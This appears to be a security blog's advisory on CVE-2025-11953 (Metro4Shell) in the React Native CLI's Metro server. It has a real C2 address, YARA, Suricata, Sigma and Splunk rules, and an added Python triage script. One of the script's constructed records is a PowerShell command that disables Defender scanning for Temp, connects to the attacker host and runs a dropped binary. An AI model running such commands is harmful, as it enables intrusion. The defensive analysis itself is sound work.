Cyber Pulse: Technical Threat Deep Dives on Active CVEs — Metro4Shell RCE in React Native CLI

Intro

A critical remote code execution vulnerability is being actively exploited in the wild, targeting the Metro Development Server used by the “@react-native-community/cli” npm package. CVE-2025-11953, tracked as “Metro4Shell,” enables unauthenticated attackers to execute arbitrary operating system commands on exposed hosts, with confirmed real-world exploitation observed since late December 2025.

📌 CVE Context

– Affected Product: @react-native-community/cli
– Affected Component: Metro Development Server
– Disclosure Timeline: Vulnerability disclosed by JFrog in November 2025; in-the-wild exploitation observed December 21, 2025
– Attack Vector: Network-based
– Authentication Required: None
– Impact: Arbitrary OS command execution

CVSS Metric Breakdown (v4.0) - CVE-2025-11953 (Metro development server remote command execution)
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Confidentiality Impact (VC): High
Integrity Impact (VI): High
Availability Impact (VA): High
Scope Changed (SC): Unchanged
Safety Impact (SI): None
Automation (SA): High
Exploit Maturity: High
Base Score: 9.8 (Critical)

Observed exploitation includes consistent payload delivery across multiple weeks, indicating operational use rather than opportunistic scanning. No public victim attribution is available at this time.

🎯 EPSS Scoring

EPSS Probability: 0.00405
EPSS Percentile: 60.625%
Model Date: Feb 3, 2026
Context:
This score indicates a relatively low absolute probability of widespread exploitation across the global internet. However, the percentile ranking places this vulnerability above average compared to other CVEs tracked by EPSS. This gap between low probability and confirmed in-the-wild exploitation highlights a key limitation of purely statistical models: targeted, niche, or developer-environment exploits may remain operationally dangerous despite modest global prevalence.

🔬 Exploitation Detail

Attackers exploit the Metro development server by sending a crafted request that results in command execution on the host. Payloads observed in the wild are Base64-encoded PowerShell commands designed to reduce host defenses and establish outbound command-and-control communications.


powershell -e JABQAHIAbwBjAGUAcwBzACAAPQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnAA==

📎 Attacker Behavior Snapshot

– Initial malicious request triggers command execution
– PowerShell modifies Microsoft Defender exclusions for working and temp directories
– Host establishes raw TCP connection to attacker infrastructure (8.218.43[.]248:60124)
– Secondary Rust-based binary is downloaded and executed from the Temp directory

🧩 Why This Matters

This vulnerability highlights how legacy configurations become high-value targets. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.

Exploitation results in:

  • Full command execution on development or CI hosts
  • Security control bypass via Defender exclusions
  • Deployment of evasive Rust-based malware

🧩 MITRE ATT&CK Mapping

Initial Access: T1190 – Exploit Public-Facing Application
Execution: T1059.001 – PowerShell
Persistence: T1505.003 – Server Software Component

🧪 Detection Rules

YARA Rule (Memory/Doc/PCAP)

rule Metro4Shell_Rust_Payload
{
    meta:
        description = "Detects Metro4Shell PowerShell dropper activity"
    strings:
        // "wide" also matches the UTF-16LE form of the command line as it appears in process memory
        $ps1     = "powershell -e" ascii wide nocase
        // C2 host and port are matched separately: in memory or captures they need not be adjacent
        $c2_ip   = "8.218.43.248" ascii wide
        $c2_port = "60124" ascii wide
    condition:
        $ps1 and $c2_ip and $c2_port
}

Suricata Rule (Network)

# 60124 is the C2 port observed with 8.218.43.248 in the wild; scope to outbound traffic from the monitored network
alert tcp $HOME_NET any -> $EXTERNAL_NET 60124 (msg:"Metro4Shell outbound C2 connection"; flow:to_server; reference:cve,2025-11953; classtype:trojan-activity; sid:202511953; rev:1;)

Sigma Rule (SIEM/EDR)

title: Metro4Shell PowerShell Execution
description: Encoded PowerShell process creation, as used by the Metro4Shell (CVE-2025-11953) dropper; requires process command-line auditing to be enabled for Event ID 4688
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    NewProcessName|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - ' -e '
      - ' -ec '
      - ' -enc'
  condition: selection
falsepositives:
  - Administrative or management-agent scripts that use encoded commands
level: high

🔎 Detection Strategies

✅ Network Detection:

  • Outbound TCP connections to non-standard ports such as 60124
  • High-entropy Base64 payloads in HTTP requests
  • Unexpected traffic originating from development servers

✅ Endpoint Detection:

  • PowerShell spawned by npm, node, or Metro processes
  • Defender exclusion modifications
  • Rust binaries executing from AppData or Temp directories
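The encoded-command payload and the post-exploitation chain described above (Defender exclusion, raw TCP to the C2, execution from Temp), as a small triage routine run over constructed process-creation records. This is an added example, not code from the article or the React Native project; host names, file paths and the stage2.exe name are hypothetical, and only the C2 address is the article's own indicator.

```python
import base64
import re

# Constructed 4688-style process-creation records (hypothetical hosts and paths); the encoded
# command lines are produced by encode_ps() below. The C2 address is the article's indicator.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
INDICATORS = {
    "defender_exclusion": re.compile(r"(?i)Add-MpPreference\s+-ExclusionPath"),
    "raw_tcp_client": re.compile(r"(?i)Net\.Sockets\.TcpClient"),
    "temp_execution": re.compile(r"(?i)(?:\$env:TEMP|\\Temp\\|\\AppData\\)[^\s'\"]*\.exe"),
}
DEV_PARENTS = ("node.exe", "npm.cmd", "npm.exe")  # dev tooling that should not spawn PowerShell

def encode_ps(cmd: str) -> str:
    """Encode the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str):
    """Reverse of encode_ps(); None when the blob is not valid Base64 or not UTF-16LE sized."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, TypeError):
        return None
    return raw.decode("utf-16-le", errors="replace") if len(raw) % 2 == 0 else None

def analyze(record: dict) -> dict:
    """Flag encoded PowerShell, decode it, and match the post-exploitation behaviours."""
    cmdline = record.get("CommandLine", "")
    m = ENCODED_FLAG.search(cmdline)
    decoded = decode_ps(m.group(1)) if m else None
    text = decoded if decoded is not None else cmdline  # scan the decoded script when present
    return {
        "encoded": m is not None,
        "decoded": decoded,
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(text)],
        "dev_parent": record.get("ParentProcessName", "").lower().endswith(DEV_PARENTS),
    }

PAGE_SAMPLE = "JABQAHIAbwBjAGUAcwBzACAAPQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnAA=="  # from the article
SAMPLE_RECORDS = [  # constructed
    {"host": "dev-build-01", "ParentProcessName": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "powershell -e " + encode_ps(
         r"Add-MpPreference -ExclusionPath $env:TEMP; "
         r"$c = New-Object Net.Sockets.TcpClient('8.218.43.248', 60124); "
         r"Start-Process $env:TEMP\stage2.exe")},
    {"host": "hr-laptop-07", "ParentProcessName": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -EncodedCommand " + encode_ps("Get-Date")},
]
```

Decoding before escalation is what separates the first record (all three behaviours, spawned by node.exe) from the second, which the Sigma rule above would also flag on the encoded flag alone.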

⚑ Splunk Query


index=windows EventCode=4688
(CommandLine="*powershell -e*" OR CommandLine="*8.218.43.248*")
| stats count by host, ParentProcessName, NewProcessName, CommandLine

πŸ› οΈ SOC Detection Strategy

– Prioritize alerts involving PowerShell execution on development hosts
– Correlate Defender configuration changes with suspicious outbound traffic
– Escalate events involving Rust binary execution from temp directories

πŸ› οΈ Tools & Techniques

Tool | Usage
Sysmon | Parent-child and network connection visibility
Velociraptor | Endpoint hunting and artifact collection
Zeek | Detection of abnormal TCP connections
Sigma/YARA | Cross-platform behavioral detection

πŸ›‘οΈ Mitigation & Response

– Patch or upgrade @react-native-community/cli immediately
– Restrict Metro development servers from internet exposure
– Monitor and revert unauthorized Defender exclusions
– Enforce outbound firewall rules for dev environments
– Conduct credential rotation if compromise is suspected

📋 Incident Response Snippets

– Review PowerShell command-line logs for encoded execution
– Audit Defender exclusions using Get-MpPreference
– Investigate AppData and Temp directories for unknown executables
– Validate no lateral movement occurred post-exploitation

📚 Suggested Reading & External References

– Microsoft Security Advisory: CVE-2025-11953
– VulnCheck Exploitation Report (December 2025)
– JFrog Metro4Shell Technical Writeup
– React Native Metro Repository

πŸ—ΎοΈ Final Thoughts

Metro4Shell demonstrates how exposed development tooling becomes a direct attack surface once reachable.

Patch exposed systems immediately and treat dev infrastructure as hostile terrain.

Published: Feb 3, 2026
